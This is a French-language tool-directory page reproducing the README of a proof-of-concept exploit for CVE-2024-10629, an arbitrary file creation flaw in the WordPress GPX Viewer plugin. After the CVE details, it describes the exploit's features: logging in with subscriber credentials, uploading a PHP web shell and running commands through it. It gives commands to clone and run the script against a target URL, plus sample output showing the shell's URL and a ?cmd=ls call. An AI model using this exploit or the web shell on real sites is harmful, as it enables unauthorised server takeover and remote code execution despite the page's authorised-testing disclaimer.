Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - Authentifié (Subscriber+) Création arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-10629
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - Authentifié (Subscriber+) Création arbitraire de fichiers

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛠️ Exploitation de GPX Viewer (CVE-2024-10629)

Ce dépôt contient une preuve de concept d'exploitation pour le plugin GPX Viewer pour WordPress, qui est vulnérable à la création arbitraire de fichiers (CVE-2024-10629). La vulnérabilité permet aux attaquants authentifiés disposant d'un accès de niveau abonné et supérieur de créer des fichiers arbitraires sur le serveur du site affecté, ce qui peut potentiellement conduire à une exécution de code à distance.

📝 Détails de la CVE

  • Identifiant CVE : CVE-2024-10629
  • Publié : 2024-11-13
  • Mis à jour : 2024-11-13
  • Plugin vulnérable : GPX Viewer <= 2.2.8
  • Type de vulnérabilité : Création arbitraire de fichiers authentifiée (Abonné+)
  • Score : 8.8 ÉLEVÉ
  • Sévérité : ÉLEVÉE
  • Version : 3.1
  • Chaîne vectorielle : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Le plugin GPX Viewer pour WordPress est vulnérable à la création arbitraire de fichiers en raison d'un manque de vérification des capacités et de validation du type de fichier dans la fonction gpxv_file_upload() dans toutes les versions jusqu'à la version 2.2.8 incluse. Cela permet aux attaquants authentifiés, ayant un accès de niveau abonné et supérieur, de créer des fichiers arbitraires sur le serveur du site affecté, ce qui peut rendre possible une exécution de code à distance.

🚀 Fonctionnalités

  • Connexion automatique en utilisant un nom d'utilisateur et un mot de passe fournis.
  • Vérification de la version du plugin GPX Viewer.
  • Téléversement d'un shell PHP sur le serveur.
  • Vérification du téléversement réussi du shell.
  • Exécution de commandes sur le serveur via le shell téléversé.

📚 Utilisation

Prérequis

  • Python 3.x
  • Bibliothèque requests

Exécution de l'exploit

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. Installez la bibliothèque requise :

    root@kitploit:~
    pip install requests
    
  3. Exécutez l'exploit :

    root@kitploit:~
    python exploit.py -u <url_cible> -un <nom_utilisateur> -p <mot_de_passe>
    

    Remplacez <url_cible>, <nom_utilisateur> et <mot_de_passe> par les valeurs appropriées.

Exemple

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un abonne -p mot_de_passe_abonne

Sortie

  • Le script affichera la version du plugin et vérifiera s'il est vulnérable.
  • Il se connectera ensuite avec les identifiants fournis et tentera de téléverser le shell.
  • En cas de succès, il vérifiera le téléversement du shell et exécutera une commande exemple (ls).
root@kitploit:~
[+] Version du plugin WordPress : 2.2.8
[+] Version vulnérable détectée. Poursuite de l'exploitation...
[+] Connexion réussie.
[+] Shell téléversé. Vérification du shell...
[+] Shell téléversé avec succès.
[+] URL du shell : http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Sortie de la commande :
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

Exemples de commandes

  • ls = Afficher les fichiers
  • uname -a = Afficher les informations système

⚠️ Avertissement

Cet exploit est destiné à des fins éducatives et à des tests autorisés uniquement. L'utilisation non autorisée de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique. Les auteurs et contributeurs de ce dépôt ne sont pas responsables d'une quelconque utilisation abusive ou des dommages causés par cet exploit.


Par : Khaled Alenazi (Nxploit)

Télécharger l’outil